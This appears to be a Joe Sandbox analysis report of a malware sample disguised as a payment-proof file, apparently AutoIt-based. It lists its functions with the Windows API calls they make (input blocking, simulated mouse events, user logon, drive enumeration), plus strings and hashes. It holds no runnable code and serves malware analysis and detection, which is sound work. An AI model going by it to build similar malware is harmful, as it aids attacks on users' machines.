Instruction ID: 1e13562f31c1da516fa787e223c4dbd441670ffcf25d75757b8355306bd26bb1
Opcode Fuzzy Hash: b1a3f0bf7fe58265e6bc0789175c114f1e1b9bdd522465ca5311387e65a3821f
Instruction Fuzzy Hash: 6022AA716083119FE724DF19C991BAFB7E4AF84310F10491DFA9A87291DBB5E904DF82

Function 00FE038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c793670901ddcb1268bc3f5e9b39cf39d1268beedf2463f1a922a8950ff10ba8
Instruction ID: 524b6d602e343093564dfaf751ca6fe795180b4735da6e9a4489c0269398f031
Opcode Fuzzy Hash: c793670901ddcb1268bc3f5e9b39cf39d1268beedf2463f1a922a8950ff10ba8
Instruction Fuzzy Hash: 07B12178D2AF404EC32396398971336B64CAFBB2C5F91D71BFC5A70D16EB2685834280

Function 00FFB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00FFB6DF

Part of subcall function 00FD344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00FFBDC3,00000000,?,?,?,?,00FFBF70,00000000,?), ref: 00FD3453
Part of subcall function 00FD344A: __aulldiv.LIBCMT ref: 00FD3473

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: cdb546a967c759bd9bfd091fa2fdf19197ee7ed56f78e95b81753b645397848f
Instruction ID: f5dccd728ad1064aa953ae010745b6c3aad18e526fc9711e744c1ee2b315f78f
Opcode Fuzzy Hash: cdb546a967c759bd9bfd091fa2fdf19197ee7ed56f78e95b81753b645397848f
Instruction Fuzzy Hash: A7217272A345148BD729CF28C491A62B7E1EB95320B248E6DE5E5CF2C0CB78B905EB54

Function 01006AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 01006ACA

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 414dbb5d3f5301d2703a7eb0bb1e77d4d17aafa0ea4d252295ee560306000a26
Instruction ID: fc39073015783b738da45c7708552026714e3fd73ab60991850eeebd0d74bdcb
Opcode Fuzzy Hash: 414dbb5d3f5301d2703a7eb0bb1e77d4d17aafa0ea4d252295ee560306000a26
Instruction Fuzzy Hash: 6EE0D8352002046FD740EFAAD804D9AB7EDEF68361F04C416F985C7391DAB5F8448F90

Function 00FF74E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00FF750A

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: ebb7663725f97b599bbc0e772519e32c67635a3bbd233022b3ea85a1f8705c0b
Instruction ID: 7dc08cdad9749c215b245eba7974d35b536a2db9bd06447f656b9c418a999981
Opcode Fuzzy Hash: ebb7663725f97b599bbc0e772519e32c67635a3bbd233022b3ea85a1f8705c0b
Instruction Fuzzy Hash: 8CD09EA556C74EB9EC29A7249C1BFB79908FB00791FDC45497703DA2E0A8D47D05B131

Function 00FEB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FEAD3E), ref: 00FEB124

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: a26ac12ca1fcdb95d885afe9b7867a5880d28164eb55bc8bd52b3d048253f209
Instruction ID: 273ef1979d9c9cd6a10396a94f1472669e95c8c94fc3ad23795819d63cccee58
Opcode Fuzzy Hash: a26ac12ca1fcdb95d885afe9b7867a5880d28164eb55bc8bd52b3d048253f209
Instruction Fuzzy Hash: 92D05E320A460EAEDF024EA4DC02EAE3F6AEB04B00F408110FA11C5090C776D531AB50

Function 0102B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 0102B352

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 0109f87d8fe4eddd4fa27608b8c454b9648de7556186388324f906a84699b09e
Instruction ID: 29642baaeb3b8304f4b6b34cb4507ff732f516781b14c5b997fc7823609b4bee
Opcode Fuzzy Hash: 0109f87d8fe4eddd4fa27608b8c454b9648de7556186388324f906a84699b09e
Instruction Fuzzy Hash: 44C04CB140011DDFC751DBC0C944AEEB7BCAB04701F104092E145F2100DB749B458B71

Function 00FD8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FD818F

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 33612e135b6ba64ed00b8eae108348ec2e43946c8cb082e76c4f4b1808c18bce
Instruction ID: ec174a8959f3edb7d5f832783da7c39488511d59913a86172bcc1abef6bb58ae
Opcode Fuzzy Hash: 33612e135b6ba64ed00b8eae108348ec2e43946c8cb082e76c4f4b1808c18bce
Instruction Fuzzy Hash: 92A0113000020CAB8F002A82E8088883F2CEA002A0B808020F80C000208B23A820AB80

Function 00FBE3B0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6da874b8954347e3c29e7565ff882a2f378a3c740e4627ad4440a51e025d0cf
Instruction ID: 5cc544bf0ba81bf31de4c6cab6bfa035bc4bb617b8aa97fb6d10240b8ec197f1
Opcode Fuzzy Hash: d6da874b8954347e3c29e7565ff882a2f378a3c740e4627ad4440a51e025d0cf
Instruction Fuzzy Hash: 2022CB75E00216CFDB24DF59C480BEAB7B1FF18310F288169E9969B341E735A985EF81

Function 00FB93F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb4fbadc774de5e0688904e0285b1c51bf06bb08c7c712574d73d2b832a21f63
Instruction ID: 14aa7c20c47c4b3f7b5c8aab7d43c7baac08e453b40578448037def6122ca3d0
Opcode Fuzzy Hash: bb4fbadc774de5e0688904e0285b1c51bf06bb08c7c712574d73d2b832a21f63
Instruction Fuzzy Hash: F612CF70A04219DFDF14DFAAD981AEEB7F5FF48300F108569E846E7251EB3AA910DB50

Function 00FBAF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 26ebd751860746431ebf7a08fe100eeef08b9cabffa68913981d259061b19786
Instruction ID: 93b136f732d3b1b8dc50bec9308cf32549ad557295fc351f19a66da155bab53e
Opcode Fuzzy Hash: 26ebd751860746431ebf7a08fe100eeef08b9cabffa68913981d259061b19786
Instruction Fuzzy Hash: 4E02C070A00209DFDF14DF69D982AAEBBF5FF48300F148069E846DB255EB39DA14DB91

Function 00FD02A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 69b023446e952cd254ccb8e3f8757eec5a557e50ba342db28ed3ba057b08054d
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: B0C1E9326051970ADF1D463AC535A3EFAA25E927B171E076ED8B3CB5D1EF20C528E620

Function 00FD06D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 3f32b40bf238feba7549b565373d8a4841f1463cff69c1c05d4abd21b8497d01
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 1DC1E63360519709DF2D463AC53563EFAA25AA27B171E036ED4B3CF6D5EF20C528E620

Function 00FCFA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: dab20a11ca38068df3d32fd21040e42911e61ba42058801ab5a0743657abe73c
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 98C1C73260509709DF1D463AC636A3EFBA25AA17B131A077DD4B3CB5D5EF10C52CE620

Function 0100A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0100A2FE
DeleteObject.GDI32(00000000), ref: 0100A310
DestroyWindow.USER32 ref: 0100A31E
GetDesktopWindow.USER32 ref: 0100A338
GetWindowRect.USER32(00000000), ref: 0100A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0100A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0100A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0100A4D8
GetClientRect.USER32(00000000,?), ref: 0100A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0100A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0100A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0100A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0100A55E
GlobalLock.KERNEL32(00000000), ref: 0100A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0100A576
GlobalUnlock.KERNEL32(00000000), ref: 0100A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0100A586
GlobalFree.KERNEL32(00000000), ref: 0100A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0100A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0103D9BC,00000000), ref: 0100A5B9
GlobalFree.KERNEL32(00000000), ref: 0100A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0100A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0100A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0100A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0100A81D

Strings

AutoIt v3, xrefs: 0100A4D0
, xrefs: 0100A7A3
DISPLAY, xrefs: 0100A680
static, xrefs: 0100A518, 0100A66F

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: c34b12604555f02a3ca60875dd6132127a4c407eafbf03053f0339ff18e0ab69
Instruction ID: 5e6fb4be0a7baa363715478911fbb7544556bf2b3fe7cef481f09c3114fe1418
Opcode Fuzzy Hash: c34b12604555f02a3ca60875dd6132127a4c407eafbf03053f0339ff18e0ab69
Instruction Fuzzy Hash: 2B028F75A00204EFEB15DFA9CD89EAE7BB9FF48310F048158F955AB290D7799D01CB60

Function 0101D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0101D2DB
GetSysColorBrush.USER32(0000000F), ref: 0101D30C
GetSysColor.USER32(0000000F), ref: 0101D318
SetBkColor.GDI32(?,000000FF), ref: 0101D332
SelectObject.GDI32(?,00000000), ref: 0101D341
InflateRect.USER32(?,000000FF,000000FF), ref: 0101D36C
GetSysColor.USER32(00000010), ref: 0101D374
CreateSolidBrush.GDI32(00000000), ref: 0101D37B
FrameRect.USER32(?,?,00000000), ref: 0101D38A
DeleteObject.GDI32(00000000), ref: 0101D391
InflateRect.USER32(?,000000FE,000000FE), ref: 0101D3DC
FillRect.USER32(?,?,00000000), ref: 0101D40E
GetWindowLongW.USER32(?,000000F0), ref: 0101D439

Part of subcall function 0101D575: GetSysColor.USER32(00000012), ref: 0101D5AE
Part of subcall function 0101D575: SetTextColor.GDI32(?,?), ref: 0101D5B2
Part of subcall function 0101D575: GetSysColorBrush.USER32(0000000F), ref: 0101D5C8
Part of subcall function 0101D575: GetSysColor.USER32(0000000F), ref: 0101D5D3
Part of subcall function 0101D575: GetSysColor.USER32(00000011), ref: 0101D5F0
Part of subcall function 0101D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0101D5FE
Part of subcall function 0101D575: SelectObject.GDI32(?,00000000), ref: 0101D60F
Part of subcall function 0101D575: SetBkColor.GDI32(?,00000000), ref: 0101D618
Part of subcall function 0101D575: SelectObject.GDI32(?,?), ref: 0101D625
Part of subcall function 0101D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0101D644
Part of subcall function 0101D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0101D65B
Part of subcall function 0101D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0101D670
Part of subcall function 0101D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0101D698

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 08be614caa011978b252365f8394f4b0ccba51c3ba36cdc9239605d9500ae6e2
Instruction ID: 055d62bb115343bff1c127b8a21c50e97d7fd6c929197becc43f51fac14f53a0
Opcode Fuzzy Hash: 08be614caa011978b252365f8394f4b0ccba51c3ba36cdc9239605d9500ae6e2
Instruction Fuzzy Hash: ED919D72408301BFDB209FA4DC08A6BBBADFB89325F404A19F9A2961D4C73AD944CB51

Function 00FCB8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00FCB98B
DeleteObject.GDI32(00000000), ref: 00FCB9CD
DeleteObject.GDI32(00000000), ref: 00FCB9D8
DestroyIcon.USER32(00000000), ref: 00FCB9E3
DestroyWindow.USER32(00000000), ref: 00FCB9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 0102D2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0102D2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0102D711

Part of subcall function 00FCB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FCB759,?,00000000,?,?,?,?,00FCB72B,00000000,?), ref: 00FCBA58

SendMessageW.USER32 ref: 0102D758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0102D76F
ImageList_Destroy.COMCTL32(00000000), ref: 0102D785
ImageList_Destroy.COMCTL32(00000000), ref: 0102D790

Strings

0, xrefs: 0102D5A5

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 38c61cd47568123ee6960ca37c2bc5ca0849eb310600607f50d909067ac06a5b
Instruction ID: 08aac698e1863a7c6f78413defe53b23f03435debe2f3e1756cf701e676f77e6
Opcode Fuzzy Hash: 38c61cd47568123ee6960ca37c2bc5ca0849eb310600607f50d909067ac06a5b
Instruction Fuzzy Hash: 1712DD345002229FDB61CF68C589BA9BBE5BF08304F1445ADEAC9CB652C735EC45DB91

Function 00FFDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FFDBD6
GetDriveTypeW.KERNEL32(?,0104DC54,?,\\.\,0104DC00), ref: 00FFDCC3
SetErrorMode.KERNEL32(00000000,0104DC54,?,\\.\,0104DC00), ref: 00FFDE29

Strings

Network, xrefs: 00FFDD01
SCSI, xrefs: 00FFDD93
Virtual, xrefs: 00FFDDEE
SSA, xrefs: 00FFDDAF
iSCSI, xrefs: 00FFDDCB
\\.\, xrefs: 00FFDC2B
Unknown, xrefs: 00FFDCE3, 00FFDD8C
PhysicalDrive, xrefs: 00FFDC67
Fibre, xrefs: 00FFDDB6
RAID, xrefs: 00FFDDC4
USB, xrefs: 00FFDDBD
Removable, xrefs: 00FFDD15
RAMDisk, xrefs: 00FFDCED
ATA, xrefs: 00FFDDA1
1394, xrefs: 00FFDDA8
ATAPI, xrefs: 00FFDD9A
Fixed, xrefs: 00FFDD0B
SSD, xrefs: 00FFDD50
SAS, xrefs: 00FFDDD2
SATA, xrefs: 00FFDDD9
CDROM, xrefs: 00FFDCF7
FileBackedVirtual, xrefs: 00FFDDF5
MMC, xrefs: 00FFDDE7

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
